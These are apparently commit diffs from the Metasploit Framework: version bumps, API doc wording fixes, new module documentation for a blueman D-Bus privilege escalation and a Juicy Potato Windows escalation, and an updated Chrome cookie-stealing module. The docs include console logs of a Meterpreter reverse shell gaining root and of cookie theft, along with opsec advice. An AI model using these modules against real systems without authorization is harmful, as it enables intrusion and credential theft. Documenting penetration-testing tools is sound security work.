aaa

Gemfile.lock

@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (5.0.1)
+    metasploit-framework (5.0.2)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -178,7 +178,7 @@ GEM
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
     metasploit-payloads (1.3.58)
-    metasploit_data_models (3.0.2)
+    metasploit_data_models (3.0.4)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
       arel-helpers
@@ -199,7 +199,7 @@ GEM
     net-ssh (5.1.0)
     network_interface (0.0.2)
     nexpose (7.2.1)
-    nokogiri (1.10.0)
+    nokogiri (1.10.1)
       mini_portile2 (~> 2.4.0)
     octokit (4.13.0)
       sawyer (~> 0.8.0, >= 0.5.3)
@@ -245,7 +245,7 @@ GEM
       thor (>= 0.18.1, < 2.0)
     rake (12.3.2)
     rb-readline (0.5.5)
-    recog (2.1.44)
+    recog (2.1.45)
       nokogiri
     redcarpet (3.4.0)
     rex-arch (0.1.13)

LICENSE_GEMS

@@ -44,10 +44,10 @@ loofah, 2.2.3, MIT
 metasm, 1.0.3, LGPL
 metasploit-concern, 2.0.5, "New BSD"
 metasploit-credential, 3.0.2, "New BSD"
-metasploit-framework, 5.0.1, "New BSD"
+metasploit-framework, 5.0.2, "New BSD"
 metasploit-model, 2.0.4, "New BSD"
 metasploit-payloads, 1.3.58, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 3.0.2, "New BSD"
+metasploit_data_models, 3.0.4, "New BSD"
 metasploit_payloads-mettle, 0.5.1, "3-clause (or ""modified"") BSD"
 method_source, 0.9.2, MIT
 mini_portile2, 2.4.0, MIT
@@ -59,7 +59,7 @@ nessus_rest, 0.1.6, MIT
 net-ssh, 5.1.0, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.2.1, "New BSD"
-nokogiri, 1.10.0, MIT
+nokogiri, 1.10.1, MIT
 octokit, 4.13.0, MIT
 openssl-ccm, 1.2.2, MIT
 openvas-omp, 0.0.4, MIT
@@ -81,7 +81,7 @@ rails-html-sanitizer, 1.0.4, MIT
 railties, 4.2.11, MIT
 rake, 12.3.2, MIT
 rb-readline, 0.5.5, BSD
-recog, 2.1.44, unknown
+recog, 2.1.45, unknown
 redcarpet, 3.4.0, MIT
 rex-arch, 0.1.13, "New BSD"
 rex-bin_tools, 0.1.6, "New BSD"

documentation/api/v1/credential_api_doc.rb

@@ -328,7 +328,7 @@ module CredentialApiDoc
 
     #Swagger documentation for /api/v1/credentials/:id PUT
     operation :put do
-      key :description, 'Update the attributes an existing credential.'
+      key :description, 'Update the attributes on an existing credential.'
       key :tags, [ 'credential' ]
 
       parameter :update_id

documentation/api/v1/host_api_doc.rb

@@ -266,7 +266,7 @@ module HostApiDoc
 
     # Swagger documentation for /api/v1/hosts/:id PUT
     operation :put do
-      key :description, 'Update the attributes an existing host.'
+      key :description, 'Update the attributes on an existing host.'
       key :tags, [ 'host' ]
 
       parameter :update_id

documentation/api/v1/login_api_doc.rb

@@ -193,7 +193,7 @@ module LoginApiDoc
 
     # Swagger documentation for /api/v1/logins/:id PUT
     operation :put do
-      key :description, 'Update the attributes an existing login.'
+      key :description, 'Update the attributes on an existing login.'
       key :tags, [ 'login' ]
 
       parameter :update_id

documentation/api/v1/loot_api_doc.rb

@@ -195,7 +195,7 @@ module LootApiDoc
 
     # Swagger documentation for /api/v1/loots/{id} PUT
     operation :put do
-      key :description, 'Update the attributes an existing loot.'
+      key :description, 'Update the attributes on an existing loot.'
       key :tags, [ 'loot' ]
 
       parameter :update_id

documentation/api/v1/note_api_doc.rb

@@ -184,7 +184,7 @@ module NoteApiDoc
 
     # Swagger documentation for /api/v1/notes/:id PUT
     operation :put do
-      key :description, 'Update the attributes an existing note.'
+      key :description, 'Update the attributes on an existing note.'
       key :tags, [ 'note' ]
 
       parameter :update_id

documentation/api/v1/service_api_doc.rb

@@ -187,7 +187,7 @@ module ServiceApiDoc
 
     # Swagger documentation for /api/v1/services/:id PUT
     operation :put do
-      key :description, 'Update the attributes an existing service.'
+      key :description, 'Update the attributes on an existing service.'
       key :tags, [ 'service' ]
 
       parameter :update_id

documentation/api/v1/session_api_doc.rb

@@ -86,7 +86,7 @@ module SessionApiDoc
   end
 
   swagger_path '/api/v1/sessions/{id}' do
-    # Swagger documentation for api/v1/sessions/:id GET
+    # Swagger documentation for /api/v1/sessions/:id GET
     operation :get do
       key :description, 'Return a specific session that is stored in the database.'
       key :tags, [ 'session' ]

documentation/api/v1/vuln_api_doc.rb

@@ -211,7 +211,7 @@ module VulnApiDoc
 
     # Swagger documentation for /api/v1/vulns/:id PUT
     operation :put do
-      key :description, 'Update the attributes an existing vuln.'
+      key :description, 'Update the attributes on an existing vuln.'
       key :tags, [ 'vuln' ]
 
       parameter :update_id

documentation/api/v1/workspace_api_doc.rb

@@ -173,7 +173,7 @@ module WorkspaceApiDoc
 
     # Swagger documentation for /api/v1/workspaces/:id PUT
     operation :put do
-      key :description, 'Update the attributes an existing workspaces.'
+      key :description, 'Update the attributes on an existing workspace.'
       key :tags, [ 'workspace' ]
 
       parameter :update_id

documentation/modules/exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.md

@@ -0,0 +1,86 @@
+## Description
+
+  This module attempts to gain root privileges by exploiting a Python
+  code injection vulnerability in blueman versions prior to 2.0.3.
+
+  The `org.blueman.Mechanism.EnableNetwork` D-Bus interface exposes the
+  `set_dhcp_handler` function which uses user input in a call to `eval`,
+  without sanitization, resulting in arbitrary code execution as root.
+
+  This module has been tested successfully with blueman version 1.23
+  on Debian 8 Jessie (x64).
+
+
+## Vulnerable Application
+
+  This module has been tested successfully with:
+
+  * blueman version 1.23 on Debian 8 Jessie (x64)
+
+  Old versions of the `blueman` package are available in [Debian snapshots](https://snapshot.debian.org/).
+
+  The following `/etc/apt/sources.list` configuration will allow a vulnerable
+  version of the `blueman` package to be installed:
+
+  ```
+  deb [check-valid-until=no] http://snapshot.debian.org/archive/debian/20140827T042507Z/ jessie main
+  deb-src [check-valid-until=no] http://snapshot.debian.org/archive/debian/20140827T042507Z/ jessie main
+  ```
+
+  Update the package sources with `apt-get -o Acquire::Check-Valid-Until=false update`
+
+  The package can be installed with `apt-get install blueman`
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. `use exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc`
+  4. `set SESSION [SESSION]`
+  5. `check`
+  6. `run`
+  7. You should get a new *root* session
+
+
+## Options
+
+  **SESSION**
+
+  Which session to use, which can be viewed with `sessions`
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `/tmp`)
+
+
+## Scenarios
+
+  ```
+  msf5 > use exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc 
+  msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp
+  payload => linux/x64/meterpreter/reverse_tcp
+  msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set lhost 172.16.191.188
+  lhost => 172.16.191.188
+  msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > run
+
+  [*] Started reverse TCP handler on 172.16.191.188:4444 
+  [*] Writing '/tmp/.DKJWL0TG7sm0M5' (249 bytes) ...
+  [*] Executing payload...
+  [*] Sending stage (861348 bytes) to 172.16.191.156
+  [*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.156:58863) at 2018-12-24 02:44:25 -0500
+  [+] Deleted /tmp/.DKJWL0TG7sm0M5
+
+  meterpreter > getuid
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo
+  Computer     : debian-8-1-x64.local
+  OS           : Debian 8.1 (Linux 3.16.0-4-amd64)
+  Architecture : x64
+  BuildTuple   : x86_64-linux-musl
+  Meterpreter  : x64/linux
+  meterpreter > 
+  ```
+

documentation/modules/exploit/windows/local/ms16_075_reflection_juicy.md

@@ -0,0 +1,29 @@
+## Intro
+
+This module utilizes the Net-NTLMv2 reflection between DCOM/RPC to achieve a SYSTEM handle for elevation of privilege. It needs a CLSID to function, a list of which can be found here: https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md
+
+From https://github.com/ohpe/juicy-potato:
+
+> RottenPotatoNG and its variants leverages the privilege escalation chain based on BITS service having the MiTM listener on 127.0.0.1:6666 and when you have SeImpersonate or SeAssignPrimaryToken privileges. During a Windows build review we found a setup where BITS was intentionally disabled and port 6666 was taken.
+> We decided to weaponize RottenPotatoNG: Say hello to Juicy Potato.
+
+For more info see:
+- [Rotten Potato](https://github.com/foxglovesec/RottenPotato)
+- [Lonely Potato](https://decoder.cloud/2017/12/23/the-lonely-potato/)
+- [Juicy Potato](https://ohpe.it/juicy-potato/)
+
+## Usage
+
+The session you wish to escalate must already have the SeImpersonate privilege.
+
+![image](https://user-images.githubusercontent.com/984628/51068493-2b6ef500-161f-11e9-9287-1eac0f942f87.png)
+
+## Scenarios:
+
+Example with BITS CLSID (NT AUTHORITY\SYSTEM):
+
+![image](https://user-images.githubusercontent.com/984628/50982077-aa1f4180-14fc-11e9-94f4-1a50ce765e0f.png)
+
+Example with UPNP CLSID (NT AUTHORITY\LOCAL SERVICE):
+
+![image](https://user-images.githubusercontent.com/984628/50982170-d76bef80-14fc-11e9-9124-ab43d69cb15c.png)

documentation/modules/post/multi/gather/chrome_cookies.md

@@ -1,16 +1,20 @@
 ## Gather Chrome Cookies
 
-Uses [Headless Chrome](https://developers.google.com/web/updates/2017/04/headless-chrome) and [Chrome's Remote Debugging](https://chromedevtools.github.io/devtools-protocol/) to read all cookies from the Default Chrome profile of the user.
+Reads all cookies from the Default Chrome Profile on the target machine. Uses [Headless Chrome](https://developers.google.com/web/updates/2017/04/headless-chrome) and [Chrome's Remote Debugging](https://chromedevtools.github.io/devtools-protocol/).
 
 ## Opsec
 
-This writes to disk temporarily. You may want to consider the tradeoff between getting the user's Chrome cookies and the noisiness of writing to disk.
+### Disk writes
+This writes randomly-named files to disk temporarily. You may want to consider the tradeoff between getting the user's Chrome cookies and the noisiness of writing to disk.
 
 The module writes a random 10-15 character file containing HTML to a directory you can specify via `WRITABLE_DIR`.
 
+### Running processes
+On non-Windows non-meterpreter sessions, a headless Chrome process will be left running after module execution is completed. You can still find and kill this process manually after the module execution is completed.
+
 ## Vulnerable Application
 
-This technique works on Chrome 59 or later on all operating systems. This module has been tested on Windows, Linux, and OSX. Windows shell sessions are currently not supported.
+This module works on Chrome 59 or later on all operating systems. This module has been tested on Windows, Linux, and OSX.
 
 Chrome does not need to be running on the target machine for this module to work.
 
@@ -40,14 +44,14 @@ Chrome does not need to be running on the target machine for this module to work
 
 ## Scenarios
 
-### Linux (or OS X)
+### Windows
 
   Suppose you've got a session on the target machine.
 
   To extract the target user's Chrome cookies
 
 ```
-msf > use post/multi/gather/chrome_cookies 
+msf > use post/multi/gather/chrome_cookies
 msf post(multi/gather/chrome_cookies) > options
 
 Module options (post/multi/gather/chrome_cookies):
@@ -57,15 +61,24 @@ Module options (post/multi/gather/chrome_cookies):
    CHROME_BINARY_PATH                      no        The path to the user's Chrome binary (leave blank to use the default for the OS)
    REMOTE_DEBUGGING_PORT  9222             no        Port on target machine to use for remote debugging protocol
    SESSION                1                yes       The session to run this module on.
-   WRITABLE_DIR       /tmp             no        Where to write the html used to steal cookies temporarily
+   WRITEABLE_DIR                           no        Where to write the html used to steal cookies temporarily, and the cookies. Leave blank to use the default for the OS (/tmp or AppData\Local\Temp)
 
 msf post(multi/gather/chrome_cookies) > set session <your session id>
 session => <your session id>
+
 msf post(multi/gather/chrome_cookies) > run
 
-[*] Activated Chrome's Remote Debugging via google-chrome --headless --disable-web-security --disable-plugins --user-data-dir="/home/<username>/.config/google-chrome/" --remote-debugging-port=9222 /tmp/qj9ADWM6Xqh
-[+] 1473 Chrome Cookies stored in /home/<local_username>/.msf4/loot/20181209094655_default_127.0.0.1_chrome.gather.co_585357.txt
+[*] Determining session platform
+[*] Platform: windows
+[*] Type: meterpreter
+[*] Activated Chrome's Remote Debugging (pid: 9452) via "\Program Files (x86)\Google\Chrome\Application\chrome.exe" --window-position=0,0 --enable-logging --v=1 --disable-translate --disable-extensions --disable-background-networking --safebrowsing-disable-auto-update --disable-sync --metrics-recording-only --disable-default-apps --mute-audio --no-first-run --disable-web-security --disable-plugins --disable-gpu  --user-data-dir="\Users\msfdev\AppData\Local\Google\Chrome\User Data"  --remote-debugging-port=9222  \Users\msfdev\AppData\Local\Temp\YaW8HKZdkk2s85D.html
+[+] Found Match
+[+] 169 Chrome Cookies stored in /home/msfdev/.msf4/loot/20190108065112_default_172.22.222.200_chrome.gather.co_082863.txt
+[*] Removing file \Users\msfdev\AppData\Local\Temp\YaW8HKZdkk2s85D.html
+[*] Removing file \Users\msfdev\AppData\Local\Google\Chrome\User Data\chrome_debug.log
 [*] Post module execution completed
+msf5 post(multi/gather/chrome_cookies) >
+
 ```
 
 ## Future features

external/source/exploits/juicypotato/.gitignore

@@ -0,0 +1,5 @@
+.vs
+.DS_Store
+Debug/
+Release/
+ipch/

external/source/exploits/juicypotato/JuicyPotato.sln

@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 15
+VisualStudioVersion = 15.0.26403.7
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "JuicyPotato", "JuicyPotato\JuicyPotato.vcxproj", "{4164003E-BA47-4A95-8586-D5AAC399C050}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{4164003E-BA47-4A95-8586-D5AAC399C050}.Debug|x64.ActiveCfg = Release|Win32
+		{4164003E-BA47-4A95-8586-D5AAC399C050}.Debug|x64.Build.0 = Release|Win32
+		{4164003E-BA47-4A95-8586-D5AAC399C050}.Debug|x86.ActiveCfg = Release|x64
+		{4164003E-BA47-4A95-8586-D5AAC399C050}.Debug|x86.Build.0 = Release|x64
+		{4164003E-BA47-4A95-8586-D5AAC399C050}.Release|x64.ActiveCfg = Release|x64
+		{4164003E-BA47-4A95-8586-D5AAC399C050}.Release|x64.Build.0 = Release|x64
+		{4164003E-BA47-4A95-8586-D5AAC399C050}.Release|x86.ActiveCfg = Release|Win32
+		{4164003E-BA47-4A95-8586-D5AAC399C050}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {3B4F867D-2997-4A0F-A8AD-9D4729DA3439}
+	EndGlobalSection
+EndGlobal